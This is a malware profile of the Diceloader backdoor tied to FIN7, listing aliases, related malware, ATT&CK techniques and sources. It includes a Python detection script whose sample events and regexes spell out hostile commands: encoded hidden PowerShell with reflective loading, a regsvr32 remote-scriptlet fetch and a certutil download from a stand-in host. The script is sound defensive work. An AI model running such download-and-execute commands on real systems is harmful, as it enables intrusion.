Diceloader

Malware profile (updated 3 months ago)
Diceloader (also written DICELOADER, and known as Lizar or Tirion) is a backdoor and loader framework attributed to ITG14, IBM's designation for the group better known as FIN7. It has been used by several threat groups, including FIN7 and FIN12, and is typically delivered through phishing emails, malicious downloads or compromised websites without the user's knowledge. Once inside a system it can be used to steal information, disrupt operations or stage ransomware. It has been observed alongside other malware families including Emotet, IcedID, Cobalt Strike, SVCReady, CargoBay, Pushdo, Minodo, AresLoader, LummaC2, Vidar, Gozi, Canyon, Nokoyawa ransomware and Black Basta ransomware.

FIN7's long-running CARBANAK and DICELOADER malware remain in use, although recent intrusions have relied more heavily on the POWERPLANT backdoor. The Domino Backdoor shares code with the Diceloader family.

Mandiant's FIN7 Power Hour research describes several delivery chains that end in DICELOADER. The POWERTRASH obfuscated loader delivers DICELOADER, and its other payloads include CARBANAK, SUPERSOFT, BEACON and PILLOWMINT. A previously undocumented persistence script has been codenamed POWERHOLD, with DICELOADER decoded and executed by another unique loader referred to as DUBLOADER. In a "BadUSB" campaign, the USB device was programmed to download STONEBOAT, which installed the DICELOADER framework on the victim system; in one instance STONEBOAT first loaded an intermediary loader called DAVESHELL, which then executed the final DICELOADER payload. Mandiant also tracks multiple phishing campaigns suspected to be FIN7 that leverage cloud marketing platforms and lead to BIRDWATCH.
The Bl00dy Ransomware Gang downloads legitimate remote access tools such as Atera RMM, uses Tor and/or other proxies, and additional malware such as Cobalt Strike Beacons, DiceLoader, and TrueBot.
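The profile above gives no fixed file or network indicators for Diceloader, but the delivery chain it describes (an obfuscated PowerShell loader, a persistence script, and payloads proxied through signed Windows binaries) maps directly onto the ATT&CK techniques this page tags. The following is an added example, not code from this page or from Mandiant, IBM or any other vendor cited here: a Python scorer that checks Sysmon/EDR-style process-creation events for Office-spawned script hosts (T1204.002), encoded PowerShell (T1059.001), hidden windows (T1564.003), reflective loading inside the decoded script (T1620), rundll32/regsvr32 proxy execution (T1218.011/T1218.010) and LOLBin downloads (T1105). The event records, the file names and the address 198.51.100.7 (a documentation range) are constructed for the example.

```python
"""Score process-creation events against ATT&CK techniques tagged on this page.

Added example: not code from the page or from any vendor it cites. Assumes
Sysmon/EDR-style process-creation records (parent image, image, command line).
Every event below is constructed for the example; none is a real Diceloader IOC.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Event:
    parent: str   # parent process image name
    image: str    # full path of the created process
    cmdline: str  # command line as logged


# -EncodedCommand takes base64 of the UTF-16LE script; require a plausible blob length.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{40,})")
USER_WRITABLE = re.compile(r"(?i)\\(users\\[^\\]+\\(appdata|downloads|desktop)|programdata|windows\\temp)\\")
DOWNLOAD_RE = re.compile(r"(?i)(invoke-webrequest|downloadstring|downloadfile|net\.webclient|"
                         r"certutil(\.exe)?\s.*-urlcache|bitsadmin(\.exe)?\s.*/transfer|curl(\.exe)?\s)")
REFLECTIVE_RE = re.compile(r"(?i)\[system\.reflection\.assembly\]::load|virtualalloc|invoke-reflectivepeinjection")
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}


def _basename(image: str) -> str:
    return image.lower().rsplit("\\", 1)[-1]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden in -EncodedCommand, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# (ATT&CK id, what the rule looks for, predicate). Ids are reported in this order.
RULES = [
    ("T1204.002", "Office application spawning a script host",
     lambda e: e.parent.lower() in OFFICE and _basename(e.image) in SCRIPT_HOSTS),
    ("T1059.001", "PowerShell launched with an encoded command",
     lambda e: _basename(e.image) == "powershell.exe" and ENC_RE.search(e.cmdline) is not None),
    ("T1564.003", "PowerShell asked to run with a hidden window",
     lambda e: _basename(e.image) == "powershell.exe"
     and re.search(r"(?i)-w(indowstyle)?\s+hidden", e.cmdline) is not None),
    ("T1620", "Reflective code loading in the decoded PowerShell script",
     lambda e: REFLECTIVE_RE.search(decode_encoded_command(e.cmdline) or "") is not None),
    ("T1218.011", "rundll32 loading a DLL from a user-writable directory",
     lambda e: _basename(e.image) == "rundll32.exe" and USER_WRITABLE.search(e.cmdline) is not None),
    ("T1218.010", "regsvr32 fetching a remote scriptlet through scrobj.dll",
     lambda e: _basename(e.image) == "regsvr32.exe"
     and re.search(r"(?i)/i:https?://|scrobj\.dll", e.cmdline) is not None),
    ("T1105", "Ingress tool transfer via a download cmdlet or LOLBin",
     lambda e: DOWNLOAD_RE.search(e.cmdline + " " + (decode_encoded_command(e.cmdline) or "")) is not None),
]


def scan(events: List[Event]) -> Dict[int, List[str]]:
    """Map event index -> matched ATT&CK ids; events with no match are omitted."""
    hits: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        matched = [tid for tid, _desc, pred in RULES if pred(ev)]
        if matched:
            hits[i] = matched
    return hits


def encode_powershell(script: str) -> str:
    """Build a -EncodedCommand argument the way a PowerShell loader would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: a stage-1 PowerShell loader that reflectively loads a PE,
# two LOLBin proxy executions, one LOLBin download, and two benign events.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
PAYLOAD = "$b=[Convert]::FromBase64String($x);[System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"
SAMPLE_EVENTS = [
    Event("winword.exe", PS, "powershell.exe -nop -w hidden -enc " + encode_powershell(PAYLOAD)),
    Event("explorer.exe", "C:\\Windows\\System32\\rundll32.exe",
          "rundll32.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\update.dll,DllMain"),
    Event("cmd.exe", "C:\\Windows\\System32\\regsvr32.exe",
          "regsvr32.exe /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll"),
    Event("powershell.exe", "C:\\Windows\\System32\\certutil.exe",
          "certutil.exe -urlcache -split -f http://198.51.100.7/d.bin C:\\ProgramData\\d.bin"),
    Event("services.exe", "C:\\Windows\\System32\\svchost.exe", "svchost.exe -k netsvcs -p"),
    Event("explorer.exe", PS, "powershell.exe -File C:\\Scripts\\inventory.ps1"),
]

if __name__ == "__main__":
    for idx, ids in scan(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {ev.parent} -> {_basename(ev.image)}: {', '.join(ids)}")
```

The detector decodes -EncodedCommand (base64 of UTF-16LE) before matching, because PowerShell-based loaders routinely hide their reflective-loading logic behind that encoding and a command-line-only rule would see nothing but a base64 blob. The benign events (a service host and a plainly invoked maintenance script) are included so the rules can be checked for false positives as well as detections; in production the same predicates would run over a stream of Sysmon Event ID 1 records rather than an in-memory list.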
Possible Aliases / Cluster overlaps
Vendors track overlapping activity clusters under different names, so the following profiles may describe the same tooling or operators and are worth checking alongside this one.
Profile (votes): description

FIN7 (6): FIN7, a notorious threat actor group known for its malicious activities, has recently been identified as targeting a large U.S. carmaker with phishing attacks. This group, which has previously operated behind fake cybersecurity companies such as Combi Security and Bastion Secure to recruit security
Lizar (5): Lizar, also known as Tirion or Diceloader, is a malicious software developed by the threat group ITG14. It's designed to exploit and damage computers or devices, infiltrating systems through suspicious downloads, emails, or websites. Once installed, it can steal personal information, disrupt operati
Carbanak (4): Carbanak is a sophisticated type of malware, short for malicious software, that is designed to exploit and damage computer systems. It can infiltrate systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt
Tirion (4): Tirion, also known as Lizar or DiceLoader, is a type of malware developed by the threat group ITG14, also known as FIN7. First reported in March 2020, Tirion has been observed in numerous ITG14 campaigns up until the end of 2022. This malicious software can infiltrate systems through suspicious down
ITG14 (2): ITG14, a threat actor identified in the cybersecurity industry, has recently been linked to malicious activities involving the Domino Backdoor. X-Force researchers have found substantial evidence connecting the Domino Backdoor to ITG14's Carbanak Backdoor. The Domino Backdoor not only shares signifi
Dave Loader (1): Dave Loader, also known as Domino Backdoor, is a potent malware that has been utilized in various cybercrime operations. This malicious software is designed to infiltrate computer systems and compromise user data, often without the victim's knowledge. It can be delivered through dubious downloads, e
Trickbot/Conti Syndicate (1): The Trickbot/Conti syndicate, also known as ITG23, is a threat actor group associated with various malicious activities. Since late February 2023, this group has been linked to Domino Backdoor campaigns utilizing the Dave Loader, a tool used to load malware onto targeted systems. The IBM Security X-
Miscellaneous Associations
Other contextual elements (keyword tags and MITRE ATT&CK technique IDs) that may help assess relevance:
Loader
Malware
Backdoor
Bot
Cobalt Strike
Ransomware
Beacon
Payload
PowerShell
Mandiant
Phishing
Windows
T1059.001 Command and Scripting Interpreter: PowerShell
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.007 Command and Scripting Interpreter: JavaScript
T1204.001 User Execution: Malicious Link
T1204.002 User Execution: Malicious File
T1569.002 System Services: Service Execution
T1195.002 Supply Chain Compromise: Compromise Software Supply Chain
T1199 Trusted Relationship
Spearphishing
T1566.002 Phishing: Spearphishing Link
T1491.002 Defacement: External Defacement
T1583.003 Acquire Infrastructure: Virtual Private Server
T1588.004 Obtain Capabilities: Digital Certificates
T1608.003 Stage Capabilities: Install Digital Certificate
T1608.005 Stage Capabilities: Link Target
T1036 Masquerading
T1036.003 Masquerading: Rename System Utilities
T1055 Process Injection
T1140 Deobfuscate/Decode Files or Information
T1497.001 Virtualization/Sandbox Evasion: System Checks
T1553.002 Subvert Trust Controls: Code Signing
T1564.003 Hide Artifacts: Hidden Window
T1620 Reflective Code Loading
T1113 Screen Capture
T1213 Data from Information Repositories
Lateral Move...
T1021.001 Remote Services: Remote Desktop Protocol
T1021.004 Remote Services: SSH
T1090 Proxy
Proxy
T1132.001 Data Encoding: Standard Encoding
T1573.002 Encrypted Channel: Asymmetric Cryptography
T1012 Query Registry
T1033 System Owner/User Discovery
T1057 Process Discovery
T1069 Permission Groups Discovery
T1069.002 Permission Groups Discovery: Domain Groups
T1082 System Information Discovery
T1083 File and Directory Discovery
T1087 Account Discovery
T1087.002 Account Discovery: Domain Account
T1482 Domain Trust Discovery
T1518 Software Discovery
T1110.002 Brute Force: Password Cracking
T1555.003 Credentials from Password Stores: Credentials from Web Browsers
T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting
T1070.004 Indicator Removal: File Deletion
T1218.011 System Binary Proxy Execution: Rundll32
T1059 Command and Scripting Interpreter
T1566.001 Phishing: Spearphishing Attachment
T1588.003 Obtain Capabilities: Code Signing Certificates
T1027 Obfuscated Files or Information
T1027.005 Obfuscated Files or Information: Indicator Removal from Tools
T1218.010 System Binary Proxy Execution: Regsvr32
T1560 Archive Collected Data
T1071.001 Application Layer Protocol: Web Protocols
T1095 Non-Application Layer Protocol
T1105 Ingress Tool Transfer
Dropper
exploitation
Exploit
Encrypt
Antivirus
Trojan
Credentials
Veeam
Reconnaissance
RMM
Associated Malware
Profile [relationship type] (votes): description

Domino [unspecified] (3): The Domino malware, a harmful program designed to exploit and damage computer systems, has been identified as the culprit behind a series of high-profile cyber attacks. The first notable incident occurred when a hacker claimed to have accessed Domino's India's massive 13 TB database on the Dark Web,
Vidar [unspecified] (2): Vidar is a Windows-based malware written in C++, derived from the Arkei stealer, which is designed to infiltrate and exploit computer systems. It has been used alongside other malware variants such as Emotet, IcedID, CobaltStrike, SVCReady, CargoBay, Pushdo, Minodo, DiceLoader, AresLoader, LummaC2,
Domino Backdoor [unspecified] (2): The Domino Backdoor is a type of malware that has been linked to multiple threat groups, highlighting the complexity of tracking these actors and their operations. This malicious software, designed to exploit and damage computers or devices, can steal personal information, disrupt operations, or hol
Minodo [unspecified] (2): Minodo is a type of malware, a harmful program designed to exploit and damage computer systems. It can infiltrate your system through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt operations, or even hold data h
Cobalt Strike Beacon [unspecified] (1): Cobalt Strike Beacon is a type of malware known for its harmful capabilities, including stealing personal information, disrupting operations, and potentially holding data hostage for ransom. The malware has been loaded by HUI Loader through various files such as mpc.tmp, dlp.ini, vmtools.ini, and an
Nokoyawa [is related to] (1): Nokoyawa is a notorious malware, particularly known for its ransomware capabilities. It has been associated with various other malicious software including Quantum, Royal, BlackBasta, Emotet, IcedID, CobaltStrike, SVCReady, CargoBay, Pushdo, Minodo, DiceLoader, AresLoader, LummaC2, Vidar, Gozi, Cany
BlackBasta [unspecified] (1): BlackBasta is a malicious software (malware) known for its disruptive and damaging effects on computer systems. It infiltrates systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt operations, or even ho
AresLoader [unspecified] (1): AresLoader is a type of malware that was first advertised for sale on the top-tier Russian-language hacking forum XSS in December 2022 by a threat actor named "DarkBLUP". This malicious software is designed to exploit and damage computer systems, often infiltrating through suspicious downloads, emai
LummaC2 [unspecified] (1): LummaC2 is a relatively new information-stealing malware, first discovered in 2022. The malicious software has been under active development, with researchers identifying LummaC2 4.0 as a dynamic malware strain in November 2023. It's been used by threat actors for initial access or data theft, often
Carbanak C2 [unspecified] (1): no description
GRIFFON [unspecified] (1): Griffon is a type of malware, malicious software designed to infiltrate and damage computers or devices without the user's knowledge. It can be spread through dubious downloads, emails, or websites, and once inside a system, it can steal personal information, disrupt operations, or even hold data fo
Pillowmint [unspecified] (1): no description
Lumma [unspecified] (1): Lumma is a prominent malware, particularly known as an information stealer. It is delivered through various means, including suspicious downloads, emails, and websites. In one instance observed by Palo Alto Networks' Unit 42, Lumma was sent over Latrodectus C2 in an infection chain. In another campa
Gozi [unspecified] (1): Gozi is a notorious malware that has been linked to numerous cyber attacks. It's typically delivered through sophisticated malvertising techniques, often used in conjunction with other initial access malware such as Pikabot botnet agent and IcedID information stealer. When an individual accesses a c
IcedID [unspecified] (1): IcedID is a malicious software (malware) designed to exploit and damage computer systems. It infects systems through suspicious downloads, emails, or websites, often without the user's knowledge. Once inside, it can steal personal information, disrupt operations, or even hold data hostage for ransom
CobaltStrike [unspecified] (1): CobaltStrike is a notorious form of malware that has been used in conjunction with other malicious software including IcedID, Qakbot, BazarLoader, Conti, Gozi, Trickbot, Quantum, Emotet, and Royal Ransomware. This malware is typically delivered through suspicious downloads, emails, or websites, ofte
Emotet [unspecified] (1): Emotet is a highly dangerous and insidious malware that has resurfaced with increased activity this summer. Originally distributed via email attachments, it infiltrates systems often without the user's knowledge, forming botnets under the control of criminals for large-scale attacks. Once infected,
Truebot [unspecified] (1): Truebot is a highly potent malware used by the threat actor group CL0P, which has been linked to various malicious activities aimed at exploiting and damaging computer systems. It can infiltrate systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once embedded,
Associated Threat Actors
Profile [relationship type] (votes): description

FIN12 [unspecified] (1): FIN12, also known as DEV-0237 and Pistachio Tempest, is a threat actor group notorious for its malicious cyber activities. Tracked by Microsoft, this group is primarily engaged in the distribution of Hive, Conti, and Ryuk ransomware. The group has been responsible for several high-profile ransomware
Bl00dy [unspecified] (1): Bl00dy is a threat actor known for its malicious activities in the cyber world. The group, along with another threat actor called Black Basta, have recently been identified as exploiting bugs in ConnectWise ScreenConnect, a popular remote management tool. This exploitation has led to a significant i
Associated Vulnerabilities
Profile [relationship type] (votes): description

Birdwatch/JSSLoader [unspecified] (1): no description. Note that BIRDWATCH (also tracked as JSSLoader) is a FIN7 malware family rather than a vulnerability; the dataset lists it in this section, but it belongs with the associated malware above.
Source Document References
Information about the Diceloader malware was read from the documents listed below (the display is limited to 20 results).
Source (created): title

MITRE (7 months ago): FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7
CERT-EU (a year ago): Anomali Cyber Watch: Lancefly APT Adopts Alternatives to Phishing, BPFdoor Removed Hardcoded Indicators, FBI Ordered Russian Malware to Self-Destruct
CERT-EU (a year ago): Anomali Cyber Watch: APT37 Adopts LNK Files, Charming Kitten Uses BellaCiao Implant-Dropper, ViperSoftX Infostealer Unique Byte Remapping Encryption
CERT-EU (a year ago): Microsoft Confirms PaperCut Servers Used to Deliver LockBit and Cl0p Ransomware
SecurityIntelligence.com (a year ago): The Trickbot/Conti Crypters: Where Are They Now?
CERT-EU (a year ago): FIN7 cybergang tied to April PaperCut attacks | #ransomware | #cybercrime – National Cyber Security Consulting
CERT-EU (a year ago): FIN7 Hackers Caught Exploiting Recent Veeam Vulnerability
CERT-EU (a year ago): Ransomware gang exploiting unpatched Veeam backup products | #ransomware | #cybercrime – National Cyber Security Consulting
SecurityIntelligence.com (a year ago): Ex-Conti and FIN7 Actors Collaborate with New Domino Backdoor
CSO Online (a year ago): Cybercrime group FIN7 targets Veeam backup servers
CERT-EU (a year ago): Google sheets & drive traffic along with this process in your network, means your are hacked
Securityaffairs (a year ago): The intricate relationships between the FIN7 group and members of the Conti gang
CERT-EU (a year ago): BlackCat Operators Distributing Ransomware Disguised as WinSCP via Malvertising
DARKReading (a year ago): FIN7, Former Conti Gang Members Collaborate on 'Domino' Malware
CERT-EU (a year ago): Russian cybercrime group FIN7 has been observed exploiting unpatched Veeam Backup & Replication instances in recent attacks, cybersecurity company WithSecure reports.